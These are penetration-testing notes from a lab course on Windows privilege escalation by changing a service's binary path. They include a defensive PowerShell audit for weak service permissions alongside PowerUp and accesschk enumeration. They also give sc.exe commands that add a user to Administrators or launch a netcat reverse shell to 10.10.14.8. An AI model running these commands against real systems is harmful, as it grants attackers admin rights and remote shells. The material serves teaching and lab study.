
# Binary Paths

## Overview

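Windows services are configured with a **binary path**: the executable (and its arguments) that the Service Control Manager launches when the service starts. If we have permission to change a service's configuration, we can replace its binary path with a malicious executable or command, which then runs with the privileges of the service account.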
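From the defender's side, the same condition can be audited by reading each service's DACL and flagging allow-ACEs that give broad groups the right to change the service configuration. The PowerShell below is an added example, not part of the original page and not code from PowerUp or AccessChk; the function name `Find-WeakServiceDacl` and the choice of which SIDs count as "broad" are assumptions.

```powershell
# Added example: audit service DACLs for rights that allow changing the binary path.
# Assumption: these well-known SIDs are the "broad" principals worth flagging.
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}
# Access rights that give control over the service configuration or its DACL.
$RiskyRights = [ordered]@{
    SERVICE_CHANGE_CONFIG = 0x0002
    WRITE_DAC             = 0x40000
    WRITE_OWNER           = 0x80000
    GENERIC_ALL           = 0x10000000
    GENERIC_WRITE         = 0x40000000
}

function Find-WeakServiceDacl {
    foreach ($svc in Get-Service) {
        # sc.exe sdshow prints the service security descriptor in SDDL form.
        $sddl = & sc.exe sdshow $svc.Name 2>$null |
            Where-Object { $_ -match '^\s*[OGDS]:' } | Select-Object -First 1
        if (-not $sddl) { continue }   # access denied or no descriptor returned
        try   { $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $sddl.Trim() }
        catch { continue }             # unparsable SDDL, skip this service
        foreach ($ace in $sd.DiscretionaryAcl) {
            # Only allow-ACEs for broad principals are of interest.
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            $sid = $ace.SecurityIdentifier.Value
            if (-not $BroadSids.ContainsKey($sid)) { continue }
            $hits = $RiskyRights.Keys | Where-Object { $ace.AccessMask -band $RiskyRights[$_] }
            if ($hits) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    Principal = $BroadSids[$sid]
                    Rights    = $hits -join ','
                    Mask      = '0x{0:X}' -f $ace.AccessMask
                }
            }
        }
    }
}

Find-WeakServiceDacl | Format-Table -AutoSize
```

Every row returned is a service whose configuration, including its binary path, can be changed by that group; the fix is to reset the descriptor with `sc.exe sdset` so that only administrators and SYSTEM hold those rights.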

## Exploitation using PowerUp

#### Run PowerUp on machine

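```powershell
# Dot-source PowerUp so its functions are loaded into the current session
. .\PowerUp.ps1
# Run every PowerUp check, including modifiable service configurations
Invoke-AllChecks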
```

<figure><img src="/files/9OyK3ubE3rgWjbQHj4qQ" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Change the binary path

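```powershell
# Use sc.exe explicitly: in Windows PowerShell, "sc" is an alias for Set-Content.
# Option 1: add the user Greg to the local Administrators group
sc.exe config daclsvc binpath= "net localgroup administrators Greg /add"
# Option 2: have the service launch a netcat reverse shell instead
sc.exe config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"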
```

#### Start service

```powershell
# Start the reconfigured service so the new binary path is executed
sc.exe start daclsvc
```

## Exploitation via Accesschk64

#### Check for services with write permissions

```
accesschk64.exe -accepteula -uwcv Everyone *
```

<figure><img src="/files/Zj5d3eQv0PFDyZn25C46" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

```
accesschk64.exe -uwcv daclsvc
```

<figure><img src="/files/Azm098szRD9lItKXsNra" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Query the service

```powershell
# Show the service configuration, including BINARY_PATH_NAME and SERVICE_START_NAME
sc.exe qc daclsvc
```

<figure><img src="/files/I7VhqgAYTcqeIH4PRRr7" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

#### Changing the binary path is the same as the last method
